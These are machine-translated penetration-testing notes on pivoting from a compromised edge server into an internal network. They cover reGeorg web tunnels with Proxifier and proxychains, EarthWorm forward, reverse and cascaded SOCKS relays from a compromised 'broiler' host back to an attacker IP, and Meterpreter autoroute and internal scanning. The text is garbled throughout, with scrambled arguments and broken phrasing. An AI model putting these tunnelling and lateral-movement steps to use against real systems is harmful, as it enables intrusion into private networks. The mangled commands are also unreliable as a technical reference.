Network and forwarding agents, one agent
reGeorg Proxifier +
1, upload reGeorg inside the tunnel corresponding to the file server language to the edge of the machine, then file access tunnel, suggesting that all seems fine to be successful, after a successful copy url
2, run python reGeorgSocksProxy.py -u after url -p port, run also suggest that all seems fine even ready
3, open proxifier, add the proxy server, proxy server, port is the port address 127.0.0.1 regeorg settings, use 4 SOCKS
4, open proxification rules proxy rules, the proxy server is added before choosing, direct mode to use the proxy
Use a proxy under linux proxychains
1, upload reGeorg inside the tunnel corresponding to the file server language to the edge of the machine, then file access tunnel, suggesting that all seems fine to be successful, copy url after a successful
2, run python reGeorgSocksProxy.py -u url - p port, after running also suggest that all seems fine even ready
3, /etc/proxychains.conf modify the configuration file, add the proxy server
in the following format
socket4 proxy mode 127.0.0.1 1234 port
+ sockscap64 reGeorg
sockscap64 new proxy server, then set up, add the program needs to use a proxy, you can run
ew agent, SOCKS protocol,
-s designated link status, 6
-port local listening -l
-d specified forwarding address or host rebound
-e designated host port to forward or rebound
-f connected host address or mapping
-g connection or the host port mapping
Forward proxy, chicken, ew -s ssocksd -l 1080 need to open a port on the target machine in
reverse proxy, the public network Ip host, ew -s rcsocks -l 1080 8888 listening port
broiler ew -s rssocks -d attack aircraft ip -e 8888
multi-stage cascade
public network ip open-channel listening channel port ew -s lcx_listen -l 1080 -e 8888
drone performed, ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999, the target network ip 999 port machine, port 1080 is mapped to the
drone execution, ew -s lcx_slave -d attack aircraft ip -e 8888 -f 2.2.2.3 forwarded host ip -g forward port 9999, -f is also currently drone ip It may be within the network ip other hosts
Three-stage cascade
EW rcsocks the -l -s 1080 -e 8888
EW lcx_slave -d -s 127.0.0.1 127.0.0.1 -e -f -g 8888 9999
EW lcx_listen the -l -s 9999 -e 7777
EW -d -s rssocks 127.0.0.1 -e 7777
the network meterpreter penetration
after 1, the machine edge the session, first of all collected information, such as the ip address, see segment, then set the route, run autoroute -s 10.10.10.0/24, run post / multi / manage / autoroute automatically provided route
2 , the scanning network machines, ip scan and port scan, run post / windows / gather / arp_scanner rhosts = 10.10.10.0 / 24, run arp_scanner -r 10.10.10.0/24, sweep port Auxiliary use / Scanner / PortScan / TCP
. 3, set up a proxy, use auxiliary / server / socks5, proxy configuration software vim /etc/proxychains.conf, add the proxy server and port, and then try to use proxychains nmap scan probe